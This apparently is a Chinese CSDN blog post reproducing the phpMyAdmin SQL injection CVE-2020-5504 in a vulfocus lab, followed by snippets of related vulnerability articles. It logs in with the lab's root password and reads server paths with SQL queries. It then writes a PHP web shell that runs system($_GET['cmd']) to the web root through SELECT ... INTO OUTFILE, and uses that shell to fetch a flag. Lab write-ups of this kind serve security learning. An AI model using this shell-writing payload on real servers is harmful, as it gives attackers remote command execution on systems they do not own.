phpmyadmin SQL注入 (CVE-2020-5504)复现

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量2.3k 收藏 13
点赞数 2
文章标签: mysql 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127533314
版权

工具简介

phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。

漏洞描述

在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。

漏洞复现

1、打开vulfocus靶场 访问IP后面加上/pma/index.php 进入登陆页面

提示的账号密码root 123456

2、点击SQL 输入 select @@datadir(查询数据库的路径)

3、输入 select @@basedir(查询MYSQL数据库的安装路径)

4、查看 SELECT load_file('/var/www/html/pma/index.php')

返回数据包3kb,一看就有东西,就对了。所以网站绝对路径为/var/www/html/pma

5、构造木马

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/shell.php'

6、使用写入的参数cmd传入值 获取flag

恸.283
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpmyadmin SQL注入CVE-2020-5504
千寻的博客
03-07 1414
phpMyAdminphpMyAdmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
GeoServer SQL 注入漏洞复现CVE-2024-25157)附poc_geoserverl漏洞
2401_84166258的博客
04-09 811
升级 org.geoserver.community:gs-jdbcconfig 到 2.21.4 或 2.22.2 或更高版本禁用 PostGIS Datastore 的 encode functions 或使用 preparedStatements 处理 sql 语句。
CVE-2020-11890:CVE-2020-11890
03-10
香港制造 CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发RCE。 Joomla中的远程代码执行(RCE) 使用您的凭据运行cve202011890.py并访问链接rce: 使用docker的指南,例如: #步骤1: docker pull hoangkien1020 / joomla:3.9.16 #第2步: 码头工人运行-d --rm -it -p 8080:80 hoangkien1020 / joomla:3.9.16 #Step 3:通过端口8080访问您的域/ IP: 带有凭据的此图像内 用户名密码 MySQL:root:root(可以通过IP:8080 / phpmyadmin访问) s
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1054
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1341
phpmyadmin弱口令至getshell 漏洞复现
【漏洞复现-phpmyadmin-SQL注入】vulfocus/phpmyadmin-cve_2020_5504
10-12 2964
phpmyadmin-SQL注入】写马
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 564
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpmyadmin漏洞分析复现
weixin_43047908的博客
08-19 1260
目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL
DVWA SQL注入漏洞复现
ch258563的博客
04-02 365
DVWA SQL注入漏洞复现
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2293
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 3万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
CVE-2016-5734(phpMyAdmin远程代码执行)漏洞复现
没事我溜达
04-06 5419
漏洞名称 phpMyAdmin远程代码执行漏洞(CVE-2016-5734) 发布时间 2016年06月21日 漏洞编号 CVE-2016-5734 威胁类型 远程代码执行 危害级别 严重 影响版本 4.0.10.16之前4.0.x版本 - 4.4.15.7之前4...
阿里云服务器漏洞phpmyadmin CVE-2016-6617 SQL注入漏洞 解决方法
cc1314_工作、学习有感
09-02 3464
阿里云服务器漏洞phpmyadmin CVE-2016-6617如下图: 首先上网搜了下 漏洞phpmyadmin CVE-2016-6617,有人这样回答的  于是又开始搜phpmyadmin的升级方法,参考http://jingyan.baidu.com/article/6b97984d9802f21ca3b0bf53.html 一、登录自己的phpmyadmin
phpmyadmin 远程文件包含漏洞(CVE-2018-12613)
a1b2c3是弱口令
12-13 1490
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 漏洞记录 漏洞编号:CVE-2018-12613 受影响版本:phpMyAdmin 4.8.0和4.8.1受到影响。 利用条件: 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServ...
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8080
多次跳转导致的ssrf
PhpMyadminSQL注入(CVE-2020-0554)复现
锋刃科技的博客
09-16 1927
简介 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 影响版本 phpMyAdmin 4 < 4.9.4 phpMyAdmin 5 < 5.0.1 环境搭建 为了方便做事,这里我直接用把phpmyadmin文件拖入刀集成环境中 下载地址 https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdm...
CVE-2016-5734
09-04
- *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值